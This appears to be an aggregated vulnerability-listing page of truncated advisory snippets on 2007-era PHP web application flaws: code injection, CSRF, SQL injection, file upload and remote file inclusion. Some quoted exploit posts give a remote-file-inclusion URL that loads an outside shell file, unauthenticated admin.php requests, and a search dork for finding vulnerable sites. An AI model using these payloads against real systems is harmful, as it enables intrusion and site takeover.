CVE-2007-5453

CVE-2007-5453 concerns Php-Stats 0.1.9.2, which contains multiple eval-injection vulnerabilities. The issue allows remote authenticated administrators to execute arbitrary code by injecting PHP sequences into the php-stats-options record in the _options table, which is subsequently evaluated via ...

CVE-2007-5032

Cross-site request forgery CSRF vulnerability in admin.php in Francisco Burzi PHP-Nuke allows remote attackers to add administrative accounts via an AddAuthor action with modified addname and addradminsuper parameters...

CVE-2007-5032

CVE-2007-5032 is a Cross-site request forgery (CSRF) in admin.php of Francisco Burzi’s PHP-Nuke. An attacker can add administrative accounts by sending a request that abuses AddAuthor with crafted add_name/add_radminsuper parameters. Documented impact includes partial confidentiality, integrity, ...

Code injection

Direct static code injection vulnerability in includes/admin/sub/confappearence.php in Shop-Script FREE 2.0 and earlier allows remote attackers to inject arbitrary PHP code into cfg/appearence.inc.php via a saveappearence action in admin.php, as demonstrated with the 1 productscount, 2 colscount,...

Code injection

admin.php in Shop-Script FREE 2.0 and earlier sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to access the admin panel...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFLFILEROOT parameter to 1 admin.php, 2 custompages.php, 3 draft.php, 4 faq.php, 5 leagues.php, 6 livedraft.php, 7 login.php, 8 myteam.php, 9 profile.php, 10...

CVE-2007-4933

Direct static code injection vulnerability in includes/admin/sub/confappearence.php in Shop-Script FREE 2.0 and earlier allows remote attackers to inject arbitrary PHP code into cfg/appearence.inc.php via a saveappearence action in admin.php, as demonstrated with the 1 productscount, 2 colscount,...

CVE-2007-4932

Shop-Script FREE 2.0 and earlier is affected by CVE-2007-4932: admin.php fails to exit after a redirect when administrative credentials are missing, allowing an unauthenticated remote attacker to access the admin panel. The NVD entry confirms the bypass/panel access impact, and Nessus notes a lik...

CVE-2007-4610

Unrestricted file upload vulnerability in config/upload.php in Moonware aka Dale Mooney Gallery allows remote attackers to upload and execute arbitrary PHP files in images/, possibly related to config/admin.php...

CVE-2007-4610

Unrestricted file upload vulnerability in config/upload.php in Moonware aka Dale Mooney Gallery allows remote attackers to upload and execute arbitrary PHP files in images/, possibly related to config/admin.php...

Sql injection

SQL injection vulnerability in Admin.php in Olate Download od 3.4.1 allows remote attackers to execute arbitrary SQL commands via an OD3AutoLogin cookie...

CVE-2007-4421

SQL injection vulnerability in Admin.php in Olate Download od 3.4.1 allows remote attackers to execute arbitrary SQL commands via an OD3AutoLogin cookie...

CVE-2007-4421

CVE-2007-4421 affects Olate Download (od) 3.4.1. The vulnerability is a SQL injection in Admin.php exploitable via an OD3_AutoLogin cookie, enabling remote attackers to execute arbitrary SQL commands. Root cause is the unsafely handled cookie value in the Admin.php flow, leading to compromised da...

CVE-2007-4421

SQL injection vulnerability in Admin.php in Olate Download od 3.4.1 allows remote attackers to execute arbitrary SQL commands via an OD3AutoLogin cookie...

Madoa Poll v1.1 Remote File Include Vulnerabilities

Madoa Poll v1.1 Remote File Include Vulnerabilities ilker kandemir ilkerkandemiratmynet.com info: / Her$ey Vatan icin / Download: http://www.finnermark.se/madoa/Madoapoll11.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Bug: require $Madoa . "config.php"; Exploit: index.php?Madoa=http://sheel.txt?...

CVE-2007-3611

admin.php in VRNews 1.1.1, and possibly other 1.x versions, does not require authentication, which allows remote attackers to perform certain administrative actions via a direct request with a 1 edit, 2 add, 3 config, or 4 del value in the act parameter...

CVE-2007-3611

VRNews 1.1.1 (admin.php) is vulnerable to an unauthenticated remote administrative action due to a direct request parameter (act) that allows actions such as edit, add, config, or del. The root cause is lack of authentication for these actions, enabling attackers to perform administrative operati...

VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability

No description provided by source. VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3. /VRNews/admin.php?act=confi...

VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability

Exploit for unknown platform in category web applications =============================================================== VRNews 1.1.1 admin.php Remote Permission Bypass Vulnerability =============================================================== VRNews v1.x = /VRNews/admin.php Permission Found...

VRNews 1.1.1 - admin.php Remote Security Bypass

VRNews 1.1.1 - admin.php Remote Security Bypass VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3...